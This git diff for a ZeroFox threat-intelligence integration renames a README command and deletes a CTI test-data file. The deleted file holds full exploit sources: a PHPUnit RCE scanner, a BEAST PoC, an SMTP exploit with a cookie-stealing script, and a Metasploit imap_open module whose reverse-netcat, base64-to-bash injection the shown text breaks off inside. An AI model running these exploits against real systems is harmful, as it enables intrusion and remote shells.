diff --git a/Packs/ZeroFox/Integrations/ZeroFox/README.md b/Packs/ZeroFox/Integrations/ZeroFox/README.md
index b2e86d113d54..5e5587e4226f 100644
--- a/Packs/ZeroFox/Integrations/ZeroFox/README.md
+++ b/Packs/ZeroFox/Integrations/ZeroFox/README.md
@@ -598,14 +598,14 @@ Looks for registered hashes in ZeroFox's CTI feeds
 | ZeroFox.MaliciousHashes.SHA512 | string | Hash in SHA512 format |
 | ZeroFox.MaliciousHashes.FoundHash | string | Indicates in which hash format was found the search |
-### zerofox-search-exploit
+### zerofox-search-exploits
 ***
 Looks for registered exploits in ZeroFox's CTI feeds
 #### Base Command
-`zerofox-search-exploit`
+`zerofox-search-exploits`
 #### Input
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/exploits.json b/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/exploits.json
deleted file mode 100644
index abdfd6c4f5fe..000000000000
--- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/exploits.json
+++ /dev/null
@@ -1,87 +0,0 @@
-{
- "next": "https://api.zerofox.com/cti/exploits/?cursor=c2E9MTYyNzU2ODM2ODAwMCZzYT0zMQ%3D%3D&since=2023-06-27T00%3A00%3A00Z",
- "results": [
- {
- "created_at": "2021-07-26T09:40:37Z",
- "cve": "CVE-2017-9841",
- "urls": [
- "https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE/blob/master/PHPUnit_eval-stdin_RCE.py"
- ],
- "exploit": "import re\nimport requests\nimport sys\nimport os\nimport base64\n\ndef exploit(dst_addr):\n\tlist = {\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/Util/PHP/eval-stdin.php\"}\n\t\n\tprint(dst_addr)\n\tfor i in list:\n\t\t\n\t\tURL=\"http://\"+dst_addr+i\n\t\tprint(URL)\n\t\tdata = \"\"\n\t\tres = requests.post(URL, data=data, verify=False)\n\t\tresponse = res.text\n\t\t\n \t\tp = re.compile('c0eb89e1d7f2982390f96603e66f2b6b') # md5(Apri1) = c0eb89e1d7f2982390f96603e66f2b6b\n\t\tm = p.match(response)\n\t\tprint(\"Status Code : %d\"% res.status_code)\n\t\tif m:\n\t\t\t\tprint(\"Vuln Found\")\n\t\telse:\n\t\t\t\tprint(\"Not Found\")\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 2:\n\t\t sys.argv.append('80')\n\telif len(sys.argv) < 3:\n\t\t\tprint ('Usage: python %s ' % os.path.basename(sys.argv[0]))\n\t\t\tsys.exit()\t\n\taddress =(sys.argv[1], sys.argv[2])\n\tdst_addr=\":\".join(address)\n\texploit(dst_addr)"
- },
- {
- "created_at": "2021-07-26T10:50:22Z",
- "cve": "CVE-2011-3389",
- "urls": [
- "https://github.com/mpgn/BEAST-PoC"
- ],
- "exploit": "#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n\n'''\n BEAST attack - PoC\n Implementation of the cryptographic path behind the attack\n Author: mpgn \n'''\n\nimport random\nimport binascii\nimport sys\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\"\"\"\n AES-CBC\n function encrypt, decrypt, pad, unpad\n You can fix the IV in the function encrypt() because TLS 1.0 fix the IV\n for the second, third... request (to gain time)\n\"\"\"\n\ndef pad(s):\n return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)\n\ndef unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n# we admit the handshake produce a secret key for the session\n# of course we do not have any HMAC etc .. but there are not usefull in this attack\ndef encrypt( msg, iv_p=0):\n raw = pad(msg)\n if iv_p == 0:\n iv = Random.new().read( AES.block_size )\n else:\n iv = iv_p\n global key\n key = Random.new().read( AES.block_size )\n cipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )\n return cipher.encrypt( raw )\n\n\"\"\"\n The PoC of BEAST attack -\n Implementation of the cryptographic path behind the attack\n - the attacker can retrieve the request send be the client \n - but also make the client send requests with the plain text of his choice\n\"\"\"\n\ndef xor_strings(xs, ys, zs):\n return \"\".join(chr(ord(x) ^ ord(y) ^ ord(z)) for x, y, z in zip(xs, ys, zs))\n\ndef xor_block(vector_init, previous_cipher,p_guess):\n xored = xor_strings(vector_init, previous_cipher, p_guess)\n return xored\n\ndef split_len(seq, length):\n return [seq[i:i+length] for i in range(0, len(seq), length)]\n\n# the PoC start here, two method, one with two request\n# the other with two request\ndef run_two_request(find_me):\n print \"Start decrypting the request block 0 --> block 0\\n\"\n \n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n\n # add_byte will be 
decrement every byte deciphered\n add_byte = 16\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n \n # good pad\n if (add_byte+padding) < 0:\n s = find_me[-1*(add_byte+padding):]\n else:\n s = find_me\n\n # the client send the encrypted request with socket and TLS1.0\n # you intercept the request and now you have: enc\n enc = encrypt(\"a\"*(add_byte+padding) + s)\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(enc[0:length_block])\n p_guess = i_know + chr(i)\n \n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[1], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[1]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n add_byte = add_byte - 1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n# the PoC start here \ndef run_three_request(find_me):\n print \"Start decrypting the request using block 0 --> block 1\\n\"\n\n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n # 
good pad\n if padding < 0:\n s = find_me[-1*(padding):]\n else:\n s = find_me\n \n # the first request is send\n first_r = encrypt(\"a\"*(padding) + s)\n # the second request is send\n enc = encrypt(\"a\"*(padding) + s, first_r[-length_block:])\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(first_r[-length_block:])\n p_guess = i_know + chr(i)\n\n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send the\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[0], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[0]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n padding = padding -1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n\n# the attacker don't know the flag\nsecret = run_three_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n# or\n# secret = run_two_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n\nfound = ''.join(secret)\nprint \"\\n\" + found"
- },
- {
- "created_at": "2021-07-26T12:19:18Z",
- "cve": "CVE-2005-2857",
- "urls": [
- "https://www.exploit-db.com/exploits/1193"
- ],
- "exploit": "#!usr/bin/perl\n#\n# FREE SMTP Spam Filter Exploit\n# ------------------------------------\n# Infam0us Gr0up - Securiti Research\n#\n# Info: infamous.2hell.com\n# Vendor URL: http://www.softstack.com/\n# \n\nuse IO::Socket;\nuse Socket;\n\nprint(\"\\n FREE SMTP Spam Filter Exploit\\n\");\nprint(\" 
---------------------------------\\n\\n\");\n\n# Changes to own feed \n$helo = \"mail.test\"; # HELO\n$mfrom = \"[support@vuln.test]\"; # MAIL FROM\n$rcpto = \"[root@localhost]\"; # RCPT TO\n$date = \"11 Feb 2099 12:07:10\"; # Date\n$from = \"Micro SEX's\"; # From mailer\n$subject = \"Check the new version.. ®®®\\n\".\n\"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]\".\n\"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]\"; # subject spammmer\n\nif($#ARGV < 0 | $#ARGV > 1) { \ndie \"usage: perl $0 [IP/host] \\nExam: perl $0 127.0.0.1 \\n\" };\n\n$adr = $ARGV[0];\n$prt = \"25\";\n\n# Don't changes this one\n$act1 = \"\\x48\\x45\\x4c\\x4f $helo\";\n$act2 = \"\\x4d\\x41\\x49\\x4c \\x46\\x52\\x4f\\x4d\\x3a$mfrom\";\n$act3 = \"\\x52\\x43\\x50\\x54 f\\x54\\x4f\\x3a$rcpto\";\n$act4 = \"\\x44\\x41\\x54\\x41\";\n$act5 = \"\\x44\\x61\\x74\\x65\\x3a $date\";\n\n$sub = \n\"\\x46\\x72\\x6f\\x6d\\x3a $from\".\n\"\\x53\\x75\\x62\\x6a\\x65\\x63\\x74\\x3a $subject\\x2e\".\n\"\\x51\\x55\\x49\\x54\";\n\nprint \"[+] Connect to $adr..\\n\";\n$remote = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>$adr,\nPeerPort=>$prt, Reuse=>1) or die \"[-] Error: can't connect to $adr:$prt\\n\";\nprint \"[+] Connected!\\n\";\n$remote->autoflush(1);\nprint \"[*] Send HELO..\";\nprint $remote \"$act1\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send MAIL FROM..\";\nprint $remote \"$act2\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send RCPT TO..\";\nprint $remote \"$act3\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATA..\";\nprint $remote \"$act4\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATE..\";\nprint $remote \"$act5\" or die \"\\n[-] Error: can't send xploit 
code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send Sub Mail..\";\nprint $remote \"$sub\" or die \"\\n[-] Error: can't send xploit code\\n\";\nprint \"[OK]\\n\";\nprint \"[*] QUIT..\\n\";\nprint \"[+] MAIL SPAMWNED!\\n\\n\";\nclose $remote;\nprint \"press any key to exit..\\n\";\n$bla= [STDIN];\n\n# milw0rm.com [2005-09-02]" - }, - { - "created_at": "2021-07-26T12:35:48Z", - "cve": "CVE-2018-19518", - "urls": [ - "https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/linux/http/php_imap_open_rce.rb" - ], - "exploit": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'php imap_open Remote Code Execution',\n 'Description' => %q{\n The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an\n IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand\n option can be passed from imap_open to execute arbitrary commands.\n While many custom applications may use imap_open, this exploit works against the following applications:\n e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.\n Prestashop exploitation requires the admin URI, and administrator credentials.\n suiteCRM/e107 require administrator credentials. 
Fixed in php 5.6.39.\n },\n 'Author' =>\n [\n 'Anton Lopanitsyn', # Vulnerability discovery and PoC\n 'Twoster', # Vulnerability discovery and PoC\n 'h00die', # Metasploit Module\n 'Paolo Serracino', # Horde IMP EDB\n 'Pietro Minniti', # Horde IMP EDB\n 'Damiano Proietti' # Horde IMP EDB\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],\n [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],\n [ 'EDB', '45865'],\n # This claims all versions of Horde IMP are vuln, but only H3 (~2012) and possibly older are vuln.\n [ 'EDB', '46136'],\n [ 'URL', 'https://bugs.php.net/bug.php?id=76428'],\n [ 'CVE', '2018-19518'],\n [ 'CVE', '2018-1000859']\n ],\n 'Privileged' => false,\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'prestashop', {} ],\n [ 'suitecrm', {}],\n [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron\n [ 'Horde IMP H3', {}],\n [ 'custom', {'WfsDelay' => 300}]\n ],\n 'PrependFork' => true,\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat',\n 'WfsDelay' => 120\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2018-10-23'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base directory path\", '/admin2769gx8k3']),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", ''])\n ])\n end\n\n def check\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && (res.code == 301 || res.code == 302)\n return CheckCode::Detected\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n 
print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 200\n return CheckCode::Detected\n end\n elsif target.name =~ /Horde IMP H3/\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'imp', 'test.php')})\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n major, minor = res.body.scan(/PHP Major Version: (?5\\.[1-6]{1})<\/li>\\s+
  • PHP Minor Version: (?[\\d]?\\d)/).flatten\n phpversion = \"#{major}.#{minor}\"\n if res.code == 200 && res.body =~ /PHP Mail Server Support Test/ && phpversion != '.'\n if Rex::Version.new(phpversion) < Rex::Version.new('5.6.39')\n vprint_good(\"PHP Version #{phpversion} is vulnerable\")\n return CheckCode::Appears\n else\n vprint_bad(\"PHP Version #{phpversion} is NOT vulnerable, patched in 5.6.39.\")\n end\n end\n end\n CheckCode::Safe\n end\n\n def command(spaces='$IFS$()')\n #payload is base64 encoded, and stuffed into the SSH option.\n enc_payload = Rex::Text.encode_base64(payload.encoded)\n command = \"-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`\"\n #final payload can not contain spaces, however $IFS$() will return the space we require\n command.gsub!(' ', spaces)\n end\n\n def exploit\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && res.code != 301\n print_error('Admin redirect not found, check URI. 
Should be something similar to /admin2769gx8k3')\n return\n end\n\n #There are a bunch of redirects that happen, so we automate going through them to get to the login page.\n while res.code == 301 || res.code == 302\n cookie = res.get_cookies\n uri = res.headers['Location']\n vprint_status(\"Redirected to #{uri}\")\n res = send_request_cgi({'uri' => uri})\n end\n\n #Tokens are generated for each URL or sub-component, we need valid ones!\n /.*token=(?\\w{32})/ =~ uri\n /id=\"redirect\" value=\"(?.*)\"\/>/ =~ res.body\n cookie = res.get_cookies\n\n unless token && redirect\n print_error('Unable to find token and redirect URL, check options.')\n return\n end\n\n vprint_status(\"Token: #{token} and Login Redirect: #{redirect}\")\n print_status(\"Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'ajax' => 1,\n 'token' => '',\n 'controller' => 'AdminLogin',\n 'submitLogin' => '1',\n 'passwd' => datastore['PASSWORD'],\n 'email' => datastore['USERNAME'],\n 'redirect' => redirect\n },\n 'vars_get' => {\n 'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated\n }\n )\n if res && res.body.include?('Invalid password')\n print_error('Invalid Login')\n return\n end\n vprint_status(\"Login JSON Response: #{res.body}\")\n uri = JSON.parse(res.body)['redirect']\n cookie = res.get_cookies\n print_good('Login Success, loading admin dashboard to pull tokens')\n res = send_request_cgi({'uri' => uri, 'cookie' => cookie})\n\n /AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n vprint_status(\"Customer Threads Token: #{token}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n })\n\n /form method=\"post\" 
action=\"index\\.php\\?controller=AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n print_good(\"Sending Payload with Final Token: #{token}\")\n data = Rex::MIME::Message.new\n data.add_part('1', nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_FILE_UPLOAD\"')\n data.add_part(\"Dear Customer,\\n\\nRegards,\\nCustomer service\", nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_SIGNATURE_1\"')\n data.add_part(\"x #{command}}\", nil, nil, 'form-data; name=\"PS_SAV_IMAP_URL\"')\n data.add_part('143', nil, nil, 'form-data; name=\"PS_SAV_IMAP_PORT\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_USER\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_PWD\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_DELETE_MSG\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_CREATE_THREADS\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_POP3\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NORSH\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_SSL\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_VALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NOVALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_TLS\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NOTLS\"')\n data.add_part('', nil, nil, 'form-data; name=\"submitOptionscustomer_thread\"')\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n )\n print_status('IMAP server change left on server, manual revert required.')\n\n if res && res.body.include?('imap Is Not Installed On This Server')\n 
print_error('PHP IMAP mod not installed/enabled ')\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 200\n cookie = res.get_cookies\n else\n print_error(\"HTTP code #{res.code} found, check options.\")\n return\n end\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'return_module' => 'Users',\n 'return_action' => 'Login',\n 'cant_login' => '',\n 'login_module' => '',\n 'login_action' => '',\n 'login_record' => '',\n 'login_token' => '',\n 'login_oauth_token' => '',\n 'login_mobile' => '',\n 'user_name' => datastore['USERNAME'],\n 'username_password' => datastore['PASSWORD'],\n 'Login' => 'Log+In'\n }\n )\n unless res\n print_error('Error loading site. 
Check options.')\n return\n end\n\n if res.code = 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n #load the email settings page to get the group_id\n vprint_status('Loading InboundEmail page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'module' => 'InboundEmail',\n 'action' => 'EditView'\n }\n )\n\n unless res\n print_error('Error loading site.')\n return\n end\n\n /\"group_id\" value=\"(?\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12})\">/ =~ res.body\n\n unless group_id\n print_error('Could not identify group_id from form page')\n return\n end\n\n print_good(\"Sending payload with group_id #{group_id}\")\n\n referer = \"http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView\"\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n #required to prevent CSRF protection from triggering\n 'headers' => { 'Referer' => referer},\n 'vars_post' => {\n 'module' => 'InboundEmail',\n 'record' => '',\n 'origin_id' => '',\n 'isDuplicate' => 'false',\n 'action' => 'Save',\n 'group_id' => group_id,\n 'return_module' => '',\n 'return_action' => '',\n 'return_id' => '',\n 'personal' => '',\n 'searchField' => '',\n 'mailbox_type' => '',\n 'button' => ' Save ',\n 'name' => Rex::Text.rand_text_alphanumeric(8),\n 'status' => 'Active',\n 'server_url' => \"x #{command}}\",\n 'email_user' => Rex::Text.rand_text_alphanumeric(8),\n 'protocol' => 'imap',\n 'email_password' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'mailbox' => 'INBOX',\n 'trashFolder' => 'TRASH',\n 'sentFolder' => '',\n 'from_name' => Rex::Text.rand_text_alphanumeric(8),\n 'is_auto_import' => 'on',\n 'from_addr' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'reply_to_name' => '',\n 
'distrib_method' => 'AOPDefault',\n 'distribution_user_name' => '',\n 'distribution_user_id' => '',\n 'distribution_options[0]' => 'all',\n 'distribution_options[1]' => '',\n 'distribution_options[2]' => '',\n 'create_case_template_id' => '',\n 'reply_to_addr' => '',\n 'template_id' => '',\n 'filter_domain' => '',\n 'email_num_autoreplies_24_hours' => '10',\n 'leaveMessagesOnMailServer' => '1'\n }\n )\n if res && res.code == 200\n print_error('Triggered CSRF protection, may try exploitation manually.')\n end\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /Horde IMP H3/\n # The original EDB module claims \"Version: All IMP versions\", however the current\n # major branch https://github.com/horde/imp/tree/74e3f5fdbac31dfcff15195832c1b9b888767982\n # does not include any reference to imap_open, nor 'test.php' in the root directory.\n # H5 (current) uses the IMP test url: /horde/test.php?app=imp with \"Mail Server Support Test\"\n # as the header:\n # https://github.com/horde/imp/blob/16400fd5f52610d27d59d21fe2e39db2c85837f1/lib/Test.php#L85\n # H3 (~2012) uses the IMP test url: /horde/imp/test.php and \"PHP Mail Server Support Test\"\n # which are the values coded into the python edb exploit.\n print_status(\"Sending Exploit Request\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'imp', 'test.php'),\n 'vars_post' => {\n 'f_submit' => 'Submit',\n 'passwd' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'server' => \"x #{command}}\",\n 'server_type' => 'imap',\n 'user' => Rex::Text.rand_text_alphanumeric(8)\n })\n unless res\n print_error('Error loading site. 
Check options.')\n return\n end\n elsif target.name =~ /e107v2/\n # e107 has an encoder which prevents $IFS$() from being used as $ = $\n # \\t also became /t, however \"\\t\" does seem to work.\n\n # e107 also uses a cron job to check bounce jobs, which may not be active.\n # either cron can be disabled, or bounce checks disabled, so we try to\n # kick the process manually, however if it doesn't work we'll hope\n # cron is running and we get a call back anyways.\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'),\n 'vars_post' => {\n 'authname' => datastore['USERNAME'],\n 'authpass' => datastore['PASSWORD'],\n 'authsubmit' => 'Log In'\n })\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code == 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n vprint_status('Checking if Cron is enabled for triggering')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n if res.body.include? 'Status: Disabled'\n print_error('Cron disabled, unexploitable.')\n return\n end\n\n print_good('Storing payload in mail settings')\n\n # the imap/pop field is hard to find. 
Check Users > Mail\n # then check \"Bounced emails - Processing method\" and set it to \"Mail account\"\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'mode' => 'prefs',\n 'action' => 'prefs'\n },\n 'vars_post' => {\n 'testaddress' => 'none@none.com',\n 'testtemplate' => 'textonly',\n 'bulkmailer' => 'smtp',\n 'smtp_server' => '1.1.1.1',\n 'smtp_username' => 'username',\n 'smtp_password' => 'password',\n 'smtp_port' => '25',\n 'smtp_options' => '',\n 'smtp_keepalive' => '0',\n 'smtp_useVERP' => '0',\n 'mail_sendstyle' => 'texthtml',\n 'mail_pause' => '3',\n 'mail_pausetime' => '4',\n 'mail_workpertick' => '5',\n 'mail_log_option' => '0',\n 'mail_bounce' => 'mail',\n 'mail_bounce_email2' => '',\n 'mail_bounce_email' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'mail_bounce_pop3' => \"x #{command(\"\\t\")}}\",\n 'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_type' => 'imap',\n 'mail_bounce_auto' => '1',\n 'updateprefs' => 'Save Changes'\n })\n\n\n vprint_status('Loading cron page to execute job manually')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if /name='e-token' value='(?\\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\\[(?\\d)\\]/m =~ res.body\n print_good(\"Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}\")\n # The post request has several duplicate columns, however all were not required. 
Left them commented for documentation purposes\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'e-token' => etoken,\n #'e-columns[]' => 'cron_category',\n 'e-columns[]' => 'cron_name',\n #'e-columns[]' => 'cron_description',\n #'e-columns[]' => 'cron_function',\n #'e-columns[]' => 'cron_tab',\n #'e-columns[]' => 'cron_lastrun',\n #'e-columns[]' => 'cron_active',\n \"cron_execute[#{cron_id}]\" => '1',\n 'etrigger_batch' => ''\n })\n\n else\n print_error('e-token not found, required for manual exploitation. Wait 60sec, cron may still trigger.')\n end\n\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /custom/\n print_status('Listener started for 300 seconds')\n print_good(\"POST request connection string: x #{command}}\")\n # URI.encode leaves + as + since that's a space encoded. So we manually change it.\n print_good(\"GET request connection string: #{URI.encode(\"x \" + command + \"}\").sub! 
